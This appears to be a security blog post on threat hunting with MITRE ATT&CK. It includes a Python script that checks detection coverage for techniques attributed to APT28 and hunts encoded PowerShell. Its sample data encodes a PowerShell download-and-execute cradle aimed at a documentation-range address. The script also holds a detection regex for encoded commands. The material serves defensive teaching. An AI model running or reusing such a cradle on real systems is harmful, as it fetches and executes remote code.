Every day we seem to hear of new and interesting linkages discovered by the medical and scientific communities. Just yesterday there was a report that young people who vape are 3.5 times more likely to try or use marijuana, compared to those who don’t. Today, I heard another report on the radio stating if a person can keep their blood pressure in check, especially in middle age, it could lower the risk of developing dementia. Researchers are constantly analyzing data and searching for patterns to identify and solve important problems. Sounds a lot like what we do as security professionals.
Whether investigating an event, engaged in threat hunting or responding to an incident, we search for threads to pull that will lead us to what is happening or what has already occurred. The process starts with a trigger, an alert or a report. Threat intelligence is then used to add context: global threat feeds, some commercial, some open source, some from industry sharing groups and some from the security vendors you already have in place. A critical but under-used source is threat and event data from your own systems, including what you learned from attacks you have already seen or handled. The MITRE ATT&CK knowledge base is another great source of intelligence on adversary tactics, techniques and procedures. For example, knowing the techniques ATT&CK attributes to APT28, you can look for related indicators of compromise or system events in your own environment and, just as importantly, check whether your sensor grid and detection rules would actually see those techniques if they were used against you.
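As an added example (not code from the original post), the following Python script shows the two halves of that last step: mapping a group's ATT&CK techniques against the detection rules and telemetry you have, to find coverage gaps, and then running one of those detections over process-creation events to hunt for the technique. The group-to-technique mapping, the rule inventory, the list of online log sources and the sample events are all constructed for illustration; they are not ATT&CK's real entry for APT28, and in practice the mapping should be pulled from the ATT&CK STIX data rather than typed in by hand.

```python
"""Coverage check and a sample hunt for techniques attributed to a group.

Added example. GROUP_TECHNIQUES, DETECTION_RULES, ONLINE_SOURCES and
SAMPLE_EVENTS are constructed sample data, not real ATT&CK or SIEM content.
"""
import base64
import re

# Constructed sample: techniques a threat-intel report attributes to a group.
# Real data should come from ATT&CK's intrusion-set -> attack-pattern
# relationships, not a hand-maintained dict.
GROUP_TECHNIQUES = {
    "APT28": {
        "T1566.001": "Phishing: Spearphishing Attachment",
        "T1059.001": "Command and Scripting Interpreter: PowerShell",
        "T1003.001": "OS Credential Dumping: LSASS Memory",
        "T1071.001": "Application Layer Protocol: Web Protocols",
        "T1078": "Valid Accounts",
    },
}

# Constructed sample: rules you have, and the telemetry each one depends on.
DETECTION_RULES = [
    {"rule": "ps_encoded_cmd", "technique": "T1059.001", "needs": "process_creation"},
    {"rule": "lsass_handle", "technique": "T1003.001", "needs": "process_access"},
    {"rule": "beacon_uri", "technique": "T1071.001", "needs": "proxy"},
]

# Constructed sample: log sources the sensor grid is actually forwarding today.
ONLINE_SOURCES = {"process_creation", "proxy"}


def coverage_report(group):
    """Classify each of the group's techniques as covered, blind or uncovered.

    covered   - a rule exists and its telemetry is flowing
    blind     - a rule exists but the telemetry it needs is not being collected
    uncovered - no rule at all
    """
    rules_by_tech = {}
    for rule in DETECTION_RULES:
        rules_by_tech.setdefault(rule["technique"], []).append(rule)

    report = {"covered": [], "blind": [], "uncovered": []}
    for tid in sorted(GROUP_TECHNIQUES[group]):
        rules = rules_by_tech.get(tid, [])
        if not rules:
            report["uncovered"].append(tid)
        elif any(r["needs"] in ONLINE_SOURCES for r in rules):
            report["covered"].append(tid)
        else:
            report["blind"].append(tid)
    return report


# Hunt for T1059.001 via encoded PowerShell command lines. The -e/-ec/-enc
# switches take base64 of a UTF-16LE string, so decode and return it.
ENCODED_PS = re.compile(
    r"powershell(?:\.exe)?\b.*?\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
    re.IGNORECASE,
)


def decode_encoded_powershell(cmdline):
    """Return the decoded command if cmdline is encoded PowerShell, else None."""
    match = ENCODED_PS.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # switch present but payload is not valid base64/UTF-16LE


def _encode_ps(command):
    """Build a -enc payload the way PowerShell expects it (for sample data)."""
    return base64.b64encode(command.encode("utf-16-le")).decode()


# Constructed sample process-creation events; 198.51.100.0/24 is a
# documentation range, not a real host.
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": "powershell.exe -NoP -W Hidden -enc "
     + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")},
    {"host": "ws02", "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"host": "srv01", "cmdline": "cmd.exe /c whoami"},
]


def hunt_encoded_powershell(events):
    """Run the T1059.001 detection over events and return the hits."""
    hits = []
    for event in events:
        decoded = decode_encoded_powershell(event["cmdline"])
        if decoded is not None:
            hits.append({"host": event["host"], "technique": "T1059.001", "decoded": decoded})
    return hits


if __name__ == "__main__":
    print(coverage_report("APT28"))
    for hit in hunt_encoded_powershell(SAMPLE_EVENTS):
        print(hit)
```

The "blind" bucket is the one worth paying attention to: a rule you believe covers a technique is worthless if the telemetry it depends on never reaches the SIEM, which is exactly the kind of gap a coverage check against a group's known techniques is meant to expose before an incident does.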